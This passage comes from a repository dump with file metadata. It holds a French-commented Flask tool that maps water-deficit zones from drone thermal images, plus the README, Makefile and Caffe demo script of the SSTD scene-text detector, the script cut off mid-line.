tif = tiff.TiffFile(os.path.join(datasetFolder, imageName.split('.')[0] + \"_lwir.tif\"))\n #calcul du champ de vue de la camera\n for key in tif.pages[0].tags[\"ExifTag\"].value.items():\n if \"FocalLength\" in str(key):\n # longueur et largeur de l'objectif en x et y selon le type de camera\n xSensor = 4.8 if \"nm\" in imageName else 10.8801\n ySensor = 3.6 if \"nm\" in imageName else 8.704\n focalLength = key[1][0]\n #calcul du champ de vue en largeur\n fovWide = 2*atan(xSensor/(2*focalLength))\n #calcul du champ de vue en hauteur\n fovTall = 2*atan(ySensor/(2*focalLength))\n #calcul de latitude, longitude, footprint\n for key, value in tif.pages[0].tags[\"GPSTag\"].value.items():\n #la latitude est définie en ratio de degrés, minutes, secondes\n if key == \"GPSLatitude\":\n imageData[\"latitude\"] = (value[0]/value[1])+((value[2]/value[3])/60)+((value[4]/value[5])/3600)\n #la longitude est définie en ratio de degrés, minutes, secondes\n elif key == \"GPSLongitude\": \n imageData[\"longitude\"] = (value[0]/value[1])+((value[2]/value[3])/60)+((value[4]/value[5])/3600)\n #(altitude par rapport au niveau de la mer)\n elif key == \"GPSAltitude\":\n #calcul des centerToCornerDistances du drone par rapport aux quatres côtés de l'image\n altitude = value[0]\n bottom = altitude * tan(-0.5 * fovWide)\n top = altitude * tan(0.5 * fovWide)\n left = altitude * tan(-0.5 * fovTall)\n right = altitude * tan(0.5 * fovTall)\n #calcul de la distance entre le centre de l'image (position de la camera) et un des quatres angles de l'image\n imageData[\"centerToCornerDistance\"] = sqrt((right - left)**2 + (top - bottom)**2)/2\n imageData[\"altitude\"] = value[0]\n\n #orientation par rapport au nord pour le calcul de bearing\n elif key == \"GPSTrack\":\n # imageData[\"northOrientation\"] = (value[0]/value[1])\n imageData[\"northOrientation\"] = 0\n return imageData\n\n\n#save image data in a csv file\ndef imageDataToCsv(imageList, coordsFile):\n for image in imageList:\n finalPoints = []\n #on récupère les données géographiques de l'image\n currentImageData = getImageData(image)\n #bearing (angle) de chaque coin de l'image par rapport au centre de celle-ci et le \n #https://www.fao.org/tempref/FI/CDrom/FAO_Training/FAO_Training/General/x6707f/GR97.GIF\n angleBearings = [315-180,45-180,225-180,135-180]\n if (int(currentImageData[\"altitude\"]) > 30):\n #calcul des latitutes et longitudes des angles de l'images\n for angle in angleBearings:\n finalPoints.append(getEndpoint(\n 
currentImageData[\"latitude\"],currentImageData[\"longitude\"],\n currentImageData[\"centerToCornerDistance\"],\n angle + currentImageData[\"northOrientation\"]))\n #ajout au fichier csv de l'image et ses coordonnees\n #on inverse les points 3 et 4 pour le parcours des points lors des etapes futures\n coordsFile.write(\n image + \"\\t\" \\\n + str(finalPoints[0][0]) + \" \" + str(finalPoints[0][1]) + \"\\t\" \\\n + str(finalPoints[1][0]) + \" \" + str(finalPoints[1][1]) + \"\\t\" \\\n + str(finalPoints[3][0]) + \" \" + str(finalPoints[3][1]) + \"\\t\" \\\n + str(finalPoints[2][0]) + \" \" + str(finalPoints[2][1]))\n coordsFile.write(\"\\n\")\n coordsFile.close()\n\n\n#fonction de lecture d'un fichier\ndef readFile(filePath):\n file = open(filePath,'r')\n return file.readlines()\n \n#recuperation des points originaux assignes a l'image\ndef getPreviousPoints(line):\n previousPoints = []\n pointsToSplit = line.strip('\\n').split('\\t')\n pointsToSplit = pointsToSplit[1:]\n for pointToSplit in pointsToSplit:\n previousPoints.append((pointToSplit.split(' ')[0],pointToSplit.split(' ')[1]))\n return previousPoints\n\ndef getCenterPoint(p1,p2):\n return ((float(p1[0]) + float(p2[0]))/2,(float(p1[1]) + float(p2[1]))/2)\n\ndef getNewCorners(p1,p2,p3,p4):\n return getCenterPoint(p1,p3),getCenterPoint(p1,p2),getCenterPoint(p2,p3),getCenterPoint(p3,p4),getCenterPoint(p4,p1)\n\ndef getNewRectangles(p1,p2,p3,p4):\n #calcul des points centraux entre deux coins de l'image\n centerPoint, centerp1p2, centerp2p3, centerp3p4, centerp4p1 = getNewCorners(p1,p2,p3,p4)\n #définition des quatre nouveaux rectangles\n newRectangles = []\n newRectangles.append([p1, centerp1p2, centerPoint, centerp4p1])\n newRectangles.append([centerp1p2, p2, centerp2p3, centerPoint])\n newRectangles.append([centerPoint, centerp2p3, p3, centerp3p4])\n newRectangles.append([centerp4p1, centerPoint, centerp3p4, p4])\n return newRectangles\n\n#fonction de decoupage des images en 4\ndef splitImage(newImagesCoordsFile,imagePath, line):\n # index du morceau d'image actuel \n indexRect = 0\n #on recupere les coordonées des coins originaux de l'image\n imageName = line.strip('\\n').split('\\t')[0]\n previousPoints = getPreviousPoints(line)\n #on récupère les dimensions en X et Y de l'image\n band = gdal.Open(os.path.join(imagePath,imageName)).GetRasterBand(1)\n xSize = band.XSize \n ySize = band.YSize\n stepX = xSize//4\n stepY = ySize//4\n croppedImages = []\n img = io.imread(os.path.join(imagePath, imageName))\n #definition des quatres nouveaux rectangles issus des coins et milieux des aretes\n newRectangles4 = getNewRectangles(previousPoints[0], previousPoints[1], previousPoints[2], previousPoints[3])\n for j in range(0, ySize, stepY):\n \n #on redécoupe chaque rectangle en 4\n newRectangles16 = getNewRectangles(newRectangles4[j//stepY][0], newRectangles4[j//stepY][1], newRectangles4[j//stepY][2], newRectangles4[j//stepY][3])\n for i in range(0, xSize, stepX):\n \n # on enregistre les nouvelles coordonnées des images découpées dans le fichier .csv\n newImagesCoordsFile.write(\n imageName.split('.')[0] + '_' + str(indexRect) + \".tif\" + \"\\t\" + \\\n str(newRectangles16[indexRect%4][0][0]) + \" \" + str(newRectangles16[indexRect%4][0][1]) + \"\\t\" + \\\n str(newRectangles16[indexRect%4][1][0]) + \" \" + str(newRectangles16[indexRect%4][1][1]) + \"\\t\" + \\\n str(newRectangles16[indexRect%4][2][0]) + \" \" + str(newRectangles16[indexRect%4][2][1]) + \"\\t\" + \\\n str(newRectangles16[indexRect%4][3][0]) + \" \" + 
str(newRectangles16[indexRect%4][3][1]) + \"\\n\"\n )\n newImage = img[j:j+stepY, i:i+stepX,:]\n croppedImages.append(newImage)\n indexRect +=1 \n #en decoupant les images de droite a gauche (differement de notre ordre de decoupage des lat/long)\n #on definit ainsi un nouvel index correspondant aux index des rectangles du csv\n cropIndex = [0,1,5,4,2,3,7,6,10,11,15,14,8,9,13,12]\n croppedImages = np.array(croppedImages)\n for i in range(len(croppedImages)):\n io.imsave(os.path.join(clippedImagesFolder, \"images\",imageName.split('.')[0] + '_' + str(i) + \".tif\"), croppedImages[cropIndex[i]], planarconfig='contig')\n\[email protected]('/clip_img')\ndef clipImages():\n global clipDone\n global areas\n #création du fichiers .csv des coordonnées des images\n coordsFile = open(coordsFilePath,\"w\")\n coordsFile.write(\"imageName\"+\"\\t\"+\"point1\"+\"\\t\"+\"point2\"+\n \"\\t\"+\"point3\"+\"\\t\"+\"point4\")\n coordsFile.write(\"\\n\")\n imageList = os.listdir(stackedImagesFolder)\n imageList.sort()\n #extraction et enregistrement des données de chaque image\n imageDataToCsv(imageList, coordsFile)\n #fichier .csv comprenant les coordonnées pour les 4 nouvelles images\n #issues de chaque image du dossier d'entrée\n newImagesCoordsFile = open(clippedImagesFolder + \"newImagesCoords.csv\",\"w\")\n newImagesCoordsFile.write(\"imageName\" + \"\\t\" + \"point1\" + \"\\t\" + \"point2\"\n \"\\t\" + \"point3\" + \"\\t\" + \"point4\" + \"\\n\")\n # on recupere les anciennes coordonnees\n lines = readFile(coordsFilePath)\n #ligne de nom des colonnes\n lines.pop(0)\n \n #on découpe chaque image du dossier\n for line in lines:\n #on récupère la ligne du csv correspondante \n splitImage(newImagesCoordsFile,stackedImagesFolder,line)\n newImagesCoordsFile.close()\n clipDone = True\n areas = []\n return \"ok\"\n\n#progression du decoupage des images \[email protected]('/progress_clip')\ndef progress_clip():\n clippedFiles = [f for f in os.listdir(os.path.join(clippedImagesFolder,'images')) if '.tif' in f]\n stackedFiles = [f for f in os.listdir(stackedImagesFolder) if '.tif' in f]\n if (clipDone):\n return str(100)\n else :\n return str(int(100 * (len(clippedFiles)/(len(stackedFiles)*16))))\n \n#progression de la prediction des images\[email protected]('/progress_predict')\ndef progress_predict():\n clippedFiles = [f for f in os.listdir(os.path.join(clippedImagesFolder,'images')) if '.tif' in f]\n if (not writingDone):\n return str(int(90 * predictProgress/(len(clippedFiles))))\n else :\n return str(int(100 * predictProgress/(len(clippedFiles))))\n\n#fonction de lecture d'un fichier csv\ndef readDataFile(fileName, separator=','):\n pd.set_option(\"display.precision\", 20)\n dataFile = pd.read_csv(fileName, sep=separator, encoding=\"utf-8\")\n dataFile = dataFile.fillna(\"\")\n return dataFile\n\ndef getCoords(listSolutions):\n dataFile = os.path.join(clippedImagesFolder,'newImagesCoords.csv')\n finalCoords = []\n mergePolygons = []\n # lecture des coordonnees des images decoupees\n imageDataFrame = readDataFile(dataFile, \"\\t\")\n for nameSol, waterType in listSolutions:\n #boucles des intersection des cibles et les images de drone\n for _,imageCoords in imageDataFrame.iterrows():\n #recuperation du nom de l'image\n imageName = imageCoords['imageName']\n if (nameSol == imageName):\n # on recupere les quatres coins de celle ci\n p0 = imageCoords['point1'].split(\" \")\n p1 = imageCoords['point2'].split(\" \")\n p2 = imageCoords['point3'].split(\" \")\n p3 = imageCoords['point4'].split(\" \")\n newCoordsSol = 
[[float(p0[1]),float(p0[0])], [float(p1[1]),float(p1[0])], [float(p2[1]),float(p2[0])], [float(p3[1]),float(p3[0])]]\n polyCoords = [(float(p0[1]), float(p0[0])),(float(p1[1]), float(p1[0])),(float(p2[1]), float(p2[0])),(float(p3[1]), float(p3[0]))]\n finalCoords.append([nameSol,newCoordsSol,waterType])\n mergePolygons.append(Polygon(polyCoords))\n print(\"unary union\")\n mergedPoly = unary_union(mergePolygons)\n multiPolygonList = []\n i = 0\n if mergedPoly.geom_type == 'Polygon':\n mergedPoly = [mergedPoly]\n\n for poly in mergedPoly:\n formattedPoly = []\n polyPoints = list(poly.exterior.coords)\n for point in polyPoints:\n formattedPoly.append([float(point[0]),float(point[1])])\n multiPolygonList.append([\"Polygone \" + str(i),formattedPoly,waterType])\n i += 1\n # finalCoords = [listSolutions[0],mergedPoly,waterType] \n # return finalCoords\n return multiPolygonList\n#prediction du modele sur les images en entree\ndef modelPrediction(imageFolder):\n global predictProgress\n #reseau de neurones entraine a classifier WW et WD\n modelWD = load_model(modelPath)\n #dossier des images\n imageList = sorted(os.listdir(imageFolder))\n debut = 0\n fin = min(1000,len(imageList))\n \n listSolutions = []\n\n while (debut != len(imageList)):\n Xs = []\n imageListBatch = imageList[debut:fin]\n #on rescale chaque image avant la prediction\n for p in imageListBatch:\n try :\n img = io.imread(os.path.join(imageFolder,p))\n except:\n print(os.path.join(imageFolder,p))\n # normalisation des images\n if (np.array(img).shape == (IMG_HEIGHT_16,IMG_WIDTH_16,NB_CHANNELS)):\n Xs.append(img/65535.)\n Xs = np.array(Xs)\n #on recupere les images detectees comme WD\n Y_pred = modelWD.predict(Xs)\n # mise au bon format pour le json\n listSolutions.extend([[i,\"WD\"] for (i,j) in zip(imageListBatch,Y_pred) if j >= 0.95])\n debut = fin\n predictProgress = fin\n fin = fin + min(1000,len(imageList) - fin)\n return listSolutions\n\nif (__name__ == '__main__'):\n app.run(threaded=True)" }, { "alpha_fraction": 0.6181474328041077, "alphanum_fraction": 0.6805292963981628, "avg_line_length": 32.125, "blob_id": "ad9365b9cf8eb5e325dceef78d0412ba6d504ae0", "content_id": "20ff4c5c29212ff92829d7888bd3151f699ce239", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 529, "license_type": "no_license", "max_line_length": 82, "num_lines": 16, "path": "/installation/setup.cpp", "repo_name": "MioHTT/projetFriendlyFruit", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <windows.h>\n\n\nint main() {\n // Python 3.7.1\n system(\"installation\\\\python-3.7.1rc2-amd64.exe\");\n //C++ VC 2015,2017,2019\n system(\"installation\\\\VC_redist.x64.exe\");\n //environnement virtuel\n system(\"python -m venv installation\\\\venvFriendlyFruit &&\"\n \"installation\\\\venvFriendlyFruit\\\\Scripts\\\\activate.bat &&\"\n \"pip install -r installation\\\\requirements.txt --build installation\\\\build &&\"\n \"pip install installation\\\\GDAL-3.1.2-cp37-cp37m-win_amd64.whl\");\n return 0;\n}" }, { "alpha_fraction": 0.7279693484306335, "alphanum_fraction": 0.7614942789077759, "avg_line_length": 46.45454406738281, "blob_id": "b1914b35aec51604af2055c74e93320a841bfdda", "content_id": "73585f0267d7f10bc5af8742b2d3b13349d0db71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1060, "license_type": "no_license", "max_line_length": 110, "num_lines": 22, "path": "/README.md", "repo_name": "MioHTT/projetFriendlyFruit", "src_encoding": 
"UTF-8", "text": "# projet Friendly Fruit\n\n\n### Installation\n\nLancer setup.exe, qui comprend :\n- Installation de python-3.7.1rc2-amd64.exe (Python 3.7.1)\n- Installation de VC_redist.x64.exe (Visual C++ 2015, 2017 et 2019 64-bits)\n- Création d'un environnement virtuel dans /src/installation/venvFriendlyFruit\n\n### Utilisation\nLancer run.exe :\n- Raffraîchir la page 127.0.0.1:5000 après que le serveur soit lancé sur le terminal\n- Mettre les images issues de la carte SD dans le dossier /src/data/images\n- Appuyer sur le bouton de choix de prédiction entre WD et WD + OW\n- Appuyer sur \"Démarrer\" pour lancer le prétraitement et la prédiction\n\n## Architecture :\n- installation/ : Dossier contenant les dépendances de l'installation du projet\n- data/ : Dossier contenant le dossier des images brutes (/images) et le dossier du modèle à dézipper (/model)\n- flask_mapbox/ : Dossier du projet avec les pages html (/templates) et le js/css associé (/static) et \n\t\t le programme principal (server.py) comprenant les scripts de pré-traitement et la prédiction du réseau\n" }, { "alpha_fraction": 0.40530404448509216, "alphanum_fraction": 0.40985801815986633, "avg_line_length": 37.489688873291016, "blob_id": "01d1187c6b853106e10645486b524a16009162ae", "content_id": "78a6cf2cf5c9a12d718f40be48bab755c803d869", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 7468, "license_type": "no_license", "max_line_length": 139, "num_lines": 194, "path": "/flask_mapbox/static/js/mapbox_js.js", "repo_name": "MioHTT/projetFriendlyFruit", "src_encoding": "UTF-8", "text": "var res = \"\";\n\nmapboxgl.accessToken = 'pk.eyJ1IjoiZnJpZW5kbHlmcnVpdHMxIiwiYSI6ImNrY3VoYXc5cjB6bGcydG80cmVpY3RqbGkifQ.EC5KmCbDEBeVgFHjYXIgzA';\nconst container = document.getElementById('map')\nwindow.addEventListener(\"load\", createMap);\n\nfunction createMap() {\n if (typeof areas !== \"undefined\") {\n var distanceContainer = document.getElementById('distance-info');\n\n // GeoJSON object to hold our measurement features\n var geojson = {\n 'type': 'FeatureCollection',\n 'features': []\n };\n\n // Used to draw a line between points\n var linestring = {\n 'type': 'Feature',\n 'geometry': {\n 'type': 'LineString',\n 'coordinates': []\n }\n };\n // document.getElementById(\"count_areas\").innerHTML += \"<br> Zone(s) trouvée(s) : \" + areas.length + \"<br>\"\n document.getElementById(\"count_areas\").innerHTML += \"<br> Zone(s) en Water Deficit : \" + areas.filter(x => x[2] === 'WD').length \n\n container2 = document.getElementById('map')\n // container2.style.display = \"none\"\n var map = new mapboxgl.Map({\n container: 'map',\n style: 'mapbox://styles/mapbox/satellite-v9',\n center: areas[0][1][0],\n zoom: 18\n });\n\n map.on('load', function () {\n map.addSource('geojson', {\n 'type': 'geojson',\n 'data': geojson\n });\n\n // Add styles to the map\n map.addLayer({\n id: 'measure-points',\n type: 'circle',\n source: 'geojson',\n paint: {\n 'circle-radius': 5,\n 'circle-color': 'blue',\n },\n filter: ['in', '$type', 'Point']\n });\n map.addLayer({\n id: 'measure-lines',\n type: 'line',\n source: 'geojson',\n layout: {\n 'line-cap': 'round',\n 'line-join': 'round'\n },\n paint: {\n 'line-color': 'blue',\n 'line-width': 2.5\n },\n filter: ['in', '$type', 'LineString']\n });\n\n map.on('click', function (e) {\n var features = map.queryRenderedFeatures(e.point, {\n layers: ['measure-points']\n });\n\n // Remove the linestring from the group\n // So we can redraw it based on the 
points collection\n if (geojson.features.length > 1) geojson.features.pop();\n\n // Clear the Distance container to populate it with a new value\n distanceContainer.innerHTML = '';\n\n // If a feature was clicked, remove it from the map\n if (features.length) {\n var id = features[0].properties.id;\n geojson.features = geojson.features.filter(function (point) {\n return point.properties.id !== id;\n });\n } else {\n var point = {\n 'type': 'Feature',\n 'geometry': {\n 'type': 'Point',\n 'coordinates': [e.lngLat.lng, e.lngLat.lat]\n },\n 'properties': {\n 'id': String(new Date().getTime())\n }\n };\n\n geojson.features.push(point);\n }\n\n if (geojson.features.length > 1) {\n linestring.geometry.coordinates = geojson.features.map(function (\n point\n ) {\n return point.geometry.coordinates;\n });\n\n geojson.features.push(linestring);\n\n // Populate the distanceContainer with total distance\n var value = document.getElementById('distance-info');\n distToMeter = turf.length(linestring)*1000\n value.textContent =\n 'Distance: ' +\n distToMeter.toLocaleString() +\n 'm';\n }\n\n map.getSource('geojson').setData(geojson);\n });\n for (coordonnees of areas) {\n console.log(coordonnees)\n map.addSource(coordonnees[0], {\n 'type': 'geojson',\n 'data': {\n 'type': 'Feature',\n 'geometry': {\n 'type': 'Polygon',\n 'coordinates': [coordonnees[1]]\n },\n properties: {\n 'coordinates': coordonnees[1],\n 'water-type': coordonnees[2],\n },\n\n }\n });\n fillcolor = (coordonnees[2] == \"OW\" ? 'blue' : 'red')\n map.addLayer({\n 'id': coordonnees[0],\n 'type': 'fill',\n 'source': coordonnees[0],\n 'layout': {},\n 'paint': {\n 'fill-color': fillcolor,\n 'fill-opacity': 0.8\n }\n });\n\n\n // Change the cursor to a pointer when the mouse is over the states layer.\n map.on('mouseenter', coordonnees[0], function () {\n map.getCanvas().style.cursor = 'pointer';\n });\n\n // Change it back to a pointer when it leaves.\n map.on('mouseleave', coordonnees[0], function () {\n map.getCanvas().style.cursor = '';\n });\n map.on('mousemove', coordonnees[0], function (e) {\n var distanceFeatures = map.queryRenderedFeatures(e.point, {\n layers: ['measure-points']\n });\n // UI indicator for clicking/hovering a point on the map\n map.getCanvas().style.cursor = distanceFeatures.length\n ? 'pointer'\n : 'crosshair';\n var features = map.queryRenderedFeatures(e.point);\n // Limit the number of properties we're displaying for\n // legibility and performance\n var displayProperties = [\n 'source',\n 'properties',\n ];\n var displayFeatures = features.map(function (feat) {\n var displayFeat = {};\n displayProperties.forEach(function (prop) {\n displayFeat[prop] = feat[prop];\n });\n return displayFeat;\n });\n\n document.getElementById('features-info').innerHTML =\n \"Nom : <br> \" + displayFeatures[0]['source'] + '<br>' +\n \"Water Type : <br> \" + displayFeatures[0]['properties']['water-type']\n + '<br>' +\n \"Coordonnées du polygone : <br> \" + displayFeatures[0]['properties']['coordinates'].replaceAll(\"],[\", \"]<br>[\")\n\n });\n }\n });\n }\n}" } ]
6
waflessnet/SSTD
https://github.com/waflessnet/SSTD
08ef82e24c059343a2848b7a64c618f425b50bba
ee77d69b6ac92b9d33c33ddfb640358e77edffed
ba89e82f7c871f62cd82996dd7a7d54716a18438
refs/heads/master
2020-09-15T06:51:30.580414
2019-11-22T09:44:52
2019-11-22T09:44:52
223,372,043
0
0
NOASSERTION
2019-11-22T09:43:38
2019-11-13T12:11:54
2018-03-12T15:10:16
null
[ { "alpha_fraction": 0.6640035510063171, "alphanum_fraction": 0.6848646402359009, "avg_line_length": 33.1363639831543, "blob_id": "6dde86a63128246f6c53fd9e3aa5935983ed3cc6", "content_id": "825b841def80716185efbf51638e6789248a1a8b", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-generic-cla", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2253, "license_type": "permissive", "max_line_length": 207, "num_lines": 66, "path": "/README.md", "repo_name": "waflessnet/SSTD", "src_encoding": "UTF-8", "text": "[![License](https://img.shields.io/badge/license-BSD-blue.svg)](LICENSE)\n# Single Shot Text Detector with Regional Attention\n\n## Introduction\n\n**SSTD** is initially described in our [ICCV 2017 spotlight paper](https://arxiv.org/abs/1709.00138).\n\n[A third-party implementation of SSTD + Focal Loss](https://github.com/HotaekHan/SSTDNet). Thanks, \nHo taek Han\n\n\n\n<img src='examples/main.png' width='800'>\n\n\nIf you find it useful in your research, please consider citing:\n```\n@inproceedings{panhe17singleshot,\n Title = {Single Shot Text Detector with Regional Attention},\n Author = {He, Pan and Huang, Weilin and He, Tong and Zhu, Qile and Qiao, Yu and Li, Xiaolin},\n Note = {Proceedings of Internatioanl Conference on Computer Vision (ICCV)},\n Year = {2017}\n }\n@inproceedings{panhe16readText,\n Title = {Reading Scene Text in Deep Convolutional Sequences},\n Author = {He, Pan and Huang, Weilin and Qiao, Yu and Loy, Chen Change and Tang, Xiaoou},\n Note = {Proceedings of AAAI Conference on Artificial Intelligence, (AAAI)},\n Year = {2016}\n }\n@inproceedings{liu16ssd,\n Title = {{SSD}: Single Shot MultiBox Detector},\n Author = {Liu, Wei and Anguelov, Dragomir and Erhan, Dumitru and Szegedy, Christian and Reed, Scott and Fu, Cheng-Yang and Berg, Alexander C.},\n Note = {Proceedings of European Conference on Computer Vision (ECCV)},\n Year = {2016}\n }\n```\n\n### Installation\n1. Get the code. We will call the directory that you cloned Caffe into `$CAFFE_ROOT`\n ```Shell\n git clone https://github.com/BestSonny/SSTD.git\n cd SSTD\n ```\n\n2. Build the code. Please follow [Caffe instruction](http://caffe.berkeleyvision.org/installation.html) to install all necessary packages and build it.\n ```Shell\n # Modify Makefile.config according to your Caffe installation.\n cp Makefile.config.example Makefile.config\n make -j8\n # Make sure to include $CAFFE_ROOT/python to your PYTHONPATH.\n make py\n make test -j8\n # (Optional)\n make runtest -j8\n # build nms\n cd examples/text\n make\n cd ..\n ```\n3. Run the demo code. 
Download Model [google drive](https://docs.google.com/uc?export=download&id=0Bx8FPKhlXE1lOTF1TzIxOGhsblk), [baiduyun](https://pan.baidu.com/s/1c1ML6dM) and put it in `text/model` folder\n ```Shell\n cd examples\n sh text/download.sh\n mkdir text/result\n python text/demo_test.py\n ```\n" }, { "alpha_fraction": 0.7152777910232544, "alphanum_fraction": 0.7152777910232544, "avg_line_length": 22.83333396911621, "blob_id": "56a03e8f27780ce89feb9d6c86bd59afef988974", "content_id": "6cda83cf6ecd1911a77a32815db7319c301cefd0", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-generic-cla", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 144, "license_type": "permissive", "max_line_length": 47, "num_lines": 6, "path": "/examples/text/Makefile", "repo_name": "waflessnet/SSTD", "src_encoding": "UTF-8", "text": "all:\n\tpython setup.py build_ext --inplace\n\tpython ./setup.py install --record install.txt\n\trm -rf build\nclean:\n\tcat install.txt | xargs rm -rf\n\n" }, { "alpha_fraction": 0.5635493993759155, "alphanum_fraction": 0.5854553580284119, "avg_line_length": 35.408905029296875, "blob_id": "41f6f0fb350eef727dde101a596ba57ffb4b89b9", "content_id": "5ca37f3fb5964f641655f056515cb00ec68fcfb0", "detected_licenses": [ "BSD-2-Clause", "LicenseRef-scancode-generic-cla", "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8993, "license_type": "permissive", "max_line_length": 126, "num_lines": 247, "path": "/examples/text/demo_test.py", "repo_name": "waflessnet/SSTD", "src_encoding": "UTF-8", "text": "import numpy as np\nimport math\nimport matplotlib\nimport cv2\nimport glob\nimport shutil\nimport time\nimport sys\nimport os.path as osp\nfrom matplotlib.patches import Polygon\nfrom threading import Thread, Lock\nfrom Queue import Queue\nimport threading\ndef add_path(path):\n if path not in sys.path:\n sys.path.insert(0, path)\n# Add lib to PYTHONPATH\nthis_dir = osp.dirname(__file__)\nlib_path = osp.join(this_dir, 'text')\nadd_path(lib_path)\nfrom nms.gpu_nms import gpu_nms\nfrom nms.cpu_nms import cpu_nms\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.figsize'] = (10, 10)\nplt.rcParams['image.interpolation'] = 'nearest'\nplt.rcParams['image.cmap'] = 'gray'\n\ncaffe_root = '../' # this file is expected to be in {caffe_root}/examples\nimport os\nos.chdir(caffe_root)\nimport sys\nsys.path.insert(0, 'python')\nimport caffe\n\nfrom google.protobuf import text_format\nfrom caffe.proto import caffe_pb2\n\n\ndef nms(dets, thresh, force_cpu=False, device_id=2):\n \"\"\"Dispatch to either CPU or GPU NMS implementations.\"\"\"\n if dets.shape[0] == 0:\n return []\n if force_cpu:\n return cpu_nms(dets, thresh)\n else:\n return gpu_nms(dets, thresh, device_id=device_id)\n\ndef xcycwh_angle_to_x1y1x2y2x3y3x4y4(box, scale=[1,1]):\n xc, yc, width, height, radians = box\n x0 = -0.5*width\n x1 = 0.5*width\n y0 = -0.5*height\n y1 = 0.5*height\n cos_radians = math.cos(radians)\n sin_radians = math.sin(radians)\n x0_r = scale[0]*(cos_radians*x0 - sin_radians*y0 + xc)\n x1_r = scale[0]*(cos_radians*x1 - sin_radians*y0 + xc)\n x2_r = scale[0]*(cos_radians*x1 - sin_radians*y1 + xc)\n x3_r = scale[0]*(cos_radians*x0 - sin_radians*y1 + xc)\n\n y0_r = scale[1]*(sin_radians*x0 + cos_radians*y0 + yc)\n y1_r = scale[1]*(sin_radians*x1 + cos_radians*y0 + yc)\n y2_r = scale[1]*(sin_radians*x1 + cos_radians*y1 + yc)\n y3_r = scale[1]*(sin_radians*x0 + cos_radians*y1 + yc)\n\n return [x0_r, x1_r, x2_r, x3_r, y0_r, 
y1_r, y2_r, y3_r]\n\ndef clip(x, min_value=0, max_value=float('inf')):\n return int(np.clip(x, min_value, max_value))\n\nimport os\ncwd = os.getcwd()\nprint cwd\nimages = glob.glob(\"./examples/text/result/*.jpg\")\nresults = glob.glob(\"./examples/text/result/*.txt\")\nremoves = images + results\n\nfor f in removes:\n os.remove(f)\n\n# load PASCAL VOC labels\nlabelmap_file = \"./examples/text/labelmap_text.prototxt\"\nfile = open(labelmap_file, 'r')\nlabelmap = caffe_pb2.LabelMap()\ntext_format.Merge(str(file.read()), labelmap)\n\ndef get_labelname(labelmap, labels):\n num_labels = len(labelmap.item)\n labelnames = []\n if type(labels) is not list:\n labels = [labels]\n for label in labels:\n found = False\n for i in xrange(0, num_labels):\n if label == labelmap.item[i].label:\n found = True\n labelnames.append(labelmap.item[i].display_name)\n break\n assert found == True\n return labelnames\n\nimage_dir = './examples/text/images'\nimage_list = glob.glob('{}/*.*'.format(image_dir))\nimage_list = sorted(image_list)\n\nimage_resizes = [512 + 128 +64]\nthreshold = 0.6\nnets = []\ndevice_id = 0\nfor image_resize in image_resizes:\n model_def = './examples/text/model/deploy.prototxt'\n model_weights = './examples/text/model/demo.caffemodel'\n model_modify = './examples/text/model/final_deploy.prototxt'\n lookup = 'step:'\n\n true_steps = [' step: {}'.format(2**(2+i)) for i in range(1,5)]\n for i in range(1,4):\n step = image_resize / (image_resize / 64.0 - 2*i)\n true_steps.append(' step: {}'.format(step))\n print true_steps\n f = open(model_modify, 'w')\n with open(model_def, 'r') as myFile:\n i = 0\n for num, line in enumerate(myFile, 1):\n if lookup in line:\n print 'found at line:', num\n f.write(true_steps[i]+'\\r\\n')\n i = i + 1\n continue\n f.write(line)\n f.close()\n\n caffe.set_device(device_id)\n caffe.set_mode_gpu()\n nets.append(caffe.Net(model_modify, # defines the structure of the mode10\n model_weights, # contains the trained weights\n caffe.TEST)) # use test mode (e.g., don't perform dropout)\n device_id = device_id + 1\n\nt = 0\ntotal_time = 0\nfor image_path in image_list:\n try:\n image = caffe.io.load_image(image_path)\n original_shape = image.shape\n original_image = image\n except:\n break\n height, width, channels = image.shape\n im_size_min = np.min(image.shape[0:2])\n im_size_max = np.max(image.shape[0:2])\n plt.imshow(original_image)\n colors = plt.cm.hsv(np.linspace(0, 1, 21)).tolist()\n currentAxis = plt.gca()\n device_id = 0\n device_ids = range(len(image_resizes))\n original_images = [original_image] * len(image_resizes)\n my_queue = Queue()\n lock = Lock()\n params = zip(device_ids, image_resizes)\n for param in params:\n my_queue.put(param)\n detlist = []\n def worker():\n while True:\n global total_time\n global t\n #grabs host from queue\n id, resize = my_queue.get()\n image_resize_height = resize\n image_resize_width = resize\n caffe.set_device(id)\n caffe.set_mode_gpu()\n transformer = caffe.io.Transformer({'data': (1,3,image_resize_height,image_resize_width)})\n transformer.set_transpose('data', (2, 0, 1))\n transformer.set_mean('data', np.array([104,117,123])) # mean pixel\n transformer.set_raw_scale('data', 255) # the reference model operates on images in [0,255] range instead of [0,1]\n transformer.set_channel_swap('data', (2,1,0)) # the reference model has channels in BGR order instead of RGB\n image = original_image\n start = time.clock()\n nets[id].blobs['data'].reshape(1,3,image_resize_height,image_resize_width)\n transformed_image = 
transformer.preprocess('data', image)\n nets[id].blobs['data'].data[...] = transformed_image\n detections = nets[id].forward()['detection_out']\n total_time = total_time + (time.clock() - start)*1000.0\n t = t + 1\n print 'avearage running time ' + str(total_time/t)\n print (image_path)\n det_label = detections[0,0,:,1]\n det_conf = detections[0,0,:,2]\n det_xmin = detections[0,0,:,3]\n det_ymin = detections[0,0,:,4]\n det_xmax = detections[0,0,:,5]\n det_ymax = detections[0,0,:,6]\n # Get detections with confidence higher than threshold\n top_indices = [i for i, conf in enumerate(det_conf) if conf >= threshold]\n top_conf = det_conf[top_indices]\n top_xmin = det_xmin[top_indices]\n top_ymin = det_ymin[top_indices]\n top_xmax = det_xmax[top_indices]\n top_ymax = det_ymax[top_indices]\n for i in xrange(top_conf.shape[0]):\n xmin = int(round(top_xmin[i] * image.shape[1]))\n ymin = int(round(top_ymin[i] * image.shape[0]))\n xmax = int(round(top_xmax[i] * image.shape[1]))\n ymax = 